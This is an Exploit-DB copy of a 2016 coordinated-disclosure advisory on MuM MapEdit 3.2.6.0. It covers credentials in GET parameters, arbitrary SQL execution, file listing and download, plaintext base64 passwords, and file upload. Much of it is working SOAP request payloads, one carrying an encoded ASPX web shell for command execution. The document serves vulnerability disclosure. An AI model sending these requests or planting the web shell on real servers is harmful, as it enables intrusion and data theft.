forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy path40397.txt
More file actions
389 lines (337 loc) · 24.3 KB
/
Copy path40397.txt
File metadata and controls
389 lines (337 loc) · 24.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit
## Product
Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH
Product: MapEdit
Affected software version: 3.2.6.0
MuM MapEdit provides geodata to the internet and intranets and is deployed on several communal and
regional governmental infrastructures to provide geodata to the population. It consists of a
silverlight client and a C#.NET backend. The communication between them is HTTP/S based and involves
the NBFS (.NET Binary Format SOAP).
Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD
## Status/Metrics/Identifier
CVE-ID: tbd
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CVSS Score: 9.0
The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with
the privileges of the web server user.
## Author/Credits
Paul Baade (TÜV Rheinland i-sec GmbH)
Sven Krewitt (TÜV Rheinland i-sec GmbH)
## Fixed Versions
According to MuM all described vulnerabilities are fixed in version 6.2.74, some of them are reportedly
already fixed in version 5.1.
## Authentication via GET Parameter
The application requires users to provide their credentials via GET Parameters. They can therefore
possibly be found in server logs or proxy logs. An example URL would be:
/Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]
## Execution of arbitrary SQL commands on contained SQLite DBs
The application contains several SQLite databases. An authenticated user may send POST requests to
the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries
on the databases.
The content of the POST request is encoded in Microsofts NBFS (.NET Binary Format SOAP) and can be
decoded to the following XML data:
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action>
<a:MessageID>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/DataAccessService.svc</a:To>
</s:Header>
<s:Body>
<QueryData>
<connection i:type="c:SQLiteConnection" xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite">
<b:CurrentRepresentation>
<b:CollectionFeatureClassName/>
<b:Id>0</b:Id>
<b:LineFeatureClassName/>
<b:Name/>
<b:PointFeatureClassName/>
<b:PolygonFeatureClassName/>
</b:CurrentRepresentation>
<b:DbVersion>999</b:DbVersion>
<b:Id>0</b:Id>
<b:Name>SYSTEM</b:Name>
<b:StorageSchemaType>Unknown</b:StorageSchemaType>
<c:Filename>[path_to_MumGeoData]\System\System.db</c:Filename>
</connection>
<sql>select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption</sql>
<queryDefinition xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Columns/>
<b:SRID>0</b:SRID>
</queryDefinition>
<parameterNames xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<parameterValues xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<startRow>1</startRow>
<bufferSize>2000</bufferSize>
<limit>0</limit>
</QueryData>
</s:Body>
</s:Envelope>
The node "Filename" can be used to access different SQLite databases on the system, while the node
"sql" contains the SQL-query to be executed on the system.
Responses to this request are encoded in NBFS as well and can be decoded to the following XML data:
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryDataResponse</a:Action>
<a:RelatesTo>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:RelatesTo>
</s:Header>
<s:Body>
<QueryDataResponse>
<QueryDataResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess">
<c:Data>eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj</c:Data>
<c:FetchedAllRows>true</c:FetchedAllRows>
<c:ResultColumns>
<c:DbColumnDefinition>
<c:Caption>NAME</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>NAME</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>CAPTION</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>CAPTION</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>VERSION_SYSTEMDATA</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>true</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>40</c:Length>
<c:Name>VERSION_SYSTEMDATA</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
</c:ResultColumns>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</QueryDataResult>
</QueryDataResponse>
</s:Body>
</s:Envelope>
The nodes "DbColumnDefinition" contain the definition of the returned columns, the node "Data"
contains the result of the SQL-query as an Base64-encoded zlib-compressed data:
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
The same result can be produced, when the database is locally read:
>sqlite3 System.db
sqlite> select name, caption, version_systemdata from project where id
in (select Project_id from usergroup_project where usergroup_id
in (select usergroup_id from user_usergroup where user_id
in (select id from user where name='TEST'))) order by caption;
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
## Arbitrary file manipulation
By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to
perform several actions.
Most interesting, from an attacker's point of view, would be the following:
- "GetFileName", which lists files in a given folder
- "DownloadFile", which enables the user to download any file the web server has read-access to
- "UploadFile", which allows to upload files to folders the web server has write-access to
The different activities are documented in the subsections below.
As well as in the SQL execution section, the request and response content is decoded from NBFS for
better readability.
### File exploration
An authenticated user is able to list all files in a given folder by sending the following content
to the IO Service.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNames</a:Action>
<a:MessageID>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<GetFileNames>
<path>[path_to_webroot]</path>
<searchPattern>*.*</searchPattern>
<recursive>false</recursive>
</GetFileNames>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNamesResponse</a:Action>
<a:RelatesTo>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:RelatesTo>
</s:Header>
<s:Body>
<GetFileNamesResponse>
<GetFileNamesResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.IO">
<c:FileNames xmlns:d="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d:string>clientaccesspolicy.xml</d:string>
<d:string>crossdomain.xml</d:string>
<d:string>iisstart.htm</d:string>
<d:string>index.html</d:string>
<d:string>index.php</d:string>
<d:string>Thumbs.db</d:string>
<d:string>web.config</d:string>
<d:string>welcome.png</d:string>
</c:FileNames>
<c:Path>[path_to_webroot]</c:Path>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</GetFileNamesResult>
</GetFileNamesResponse>
</s:Body>
</s:Envelope>
### Download of arbitrary files
The same web service can be abused to download any file, that the web server user has read-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFile</a:Action>
<a:MessageID>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<DownloadFile>
<filename>[path_to_webroot]\Mum.Geo.Services\Admin.html</filename>
</DownloadFile>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:RelatesTo>
</s:Header>
<s:Body>
<DownloadFileResponse>
<DownloadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Server.Core.IO" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Data>77u/PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQogICAgPHRpdGxlPkFkbWluPC90aXRsZT4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOyBVUkw9U3RhcnQuYXNweD9BZG1pbk1vZGU9dHJ1ZSIvPg0KPC9oZWFkPg0KPGJvZHk+DQogIDxwPjxhIGhyZWY9IlN0YXJ0LmFzcHg/QWRtaW5Nb2RlPXRydWUiPlN0YXJ0IE11bSBBZG1pbmlzdHJhdG9yPC9hPjwvcD4gDQo8L2JvZHk+DQo8L2h0bWw+DQo=</b:Data>
<b:FileNotFound>false</b:FileNotFound>
<b:IsComplete>true</b:IsComplete>
</DownloadFileResult>
</DownloadFileResponse>
</s:Body>
</s:Envelope>
The node "Data" itself can be base64-decoded, to receive the file contents:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Admin</title>
<meta http-equiv="refresh" content="0; URL=Start.aspx?AdminMode=true"/>
</head>
<body>
<p><a href="Start.aspx?AdminMode=true">Start Mum Administrator</a></p>
</body>
</html>
### Upload of arbitrary files
The web service can be abused to upload a file to any folder, that the web server user has
write-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFile</a:Action>
<a:MessageID>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<UploadFile>
<clientFilename/>
<serverFilename>[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx</serverFilename>
<temporaryServerFilename>[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626</temporaryServerFilename>
<data>eJyFk21P2zAQx9/nU5w8IbXalj4A29Qk1aANolJHK5qJaW+QkxwhW2JHtgNBE99956TdWEHsleN7/Pl/F//gM6x5hrDkIqvpI2CzNwzmGNdZwIyqkUGkeEL2G15ouh1MHZ+SFmUllYELXqKuWv/mQRss3XnOMyG1yRP9/+DFqovRicor8wQiIQhVC24CplHdoWJT507maQt7vZQ87cn4ByYGNIoU1TsI71CYE5VpwL7zy3l0tFG5yCBsktrgrEx7WwNXmQ1YK5mg1hvDlVmIGwmVziEAgfew7+r1PYe87lleoH0DhbGkTF1skHUe6luX1F9b1yAB9pa6dK5LTHNFoFRNpFylq9pUtaE4K24X8lXj5haLImzQspKv1drbMUJFpu2321L1KI2gNkYhLy+RkwKgTalSRZGV+28vbyeFpeuiXJsTyVCk9m1b26yQGu1doamVAO2Riq3o9Fhiu54VefJzX/ftJPfkv6RBS6HRvVK5wR7zK4VTRrX3HJt2uO65KYtQJDLF3t95mcYWdCNsTL//PJX5g13RR8cfdCtEu3QefVnaIzyZ02FyU+CU36MAritXoIF7jLWV2x90TkreBscyfQA6b6QqIU8DO2UGJZpbSZeKtvr5VvpUdmIZT2XT5nTYjJR+KGiTv79fXMzDbxMYDUceLMOzaAJHw+Oq8WC92iyixepiAjzWsqBnexCt1hMYD6tmvxNc5am5Ddj42Dqn/uBJ3y3FaW2MFB0E0h8oXqQY7yg+fHydYvTpBQrbMWDYDonBSrQ70Qr1Z0N2cB3Olm3JYyxatCIubJGX0A53aIej4esCjZ+jTWeyLGnvJ133tqGdrR2mPe1w21m3+/EbI5Kikw==</data>
<append>false</append>
<completed>true</completed>
</UploadFile>
</s:Body>
</s:Envelope>
The "data" node contains a base64-encoded, zlib-packed aspx web shell. It can be used to issue
arbitrary commands on the compromised host.
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:RelatesTo>
</s:Header>
<s:Body>
<UploadFileResponse>
<UploadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter/>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</UploadFileResult>
</UploadFileResponse>
</s:Body>
</s:Envelope>
## Base64 encoded Passwords
In the database file in \MumGeoData\System\System.db Passwords are stored in the tables "user" and
"connection". Both tables store their passwords in plain text with base64 encoding applied.
Example:
sqlite> select * from user where name='MUM';
<User GUID>|MUM|<base64 encoded password>|1||
## Remark about information disclosures
Observing the communication between a MapEdit Silverlight client and its backend server, various
information could be gathered, particularly file paths and license keys. Additionally the error
messages, that the server generates discloses quite a lot of information about the backend parsing
process.
## History
2016-06-07 Discovery of mentioned vulnerabilities
2016-06-09 First contact with MuM
2016-06-23 confirmation of mentioned vulnerabilities
2016-07-29 Release of version 6.2.74
2016-09-13 Public disclosure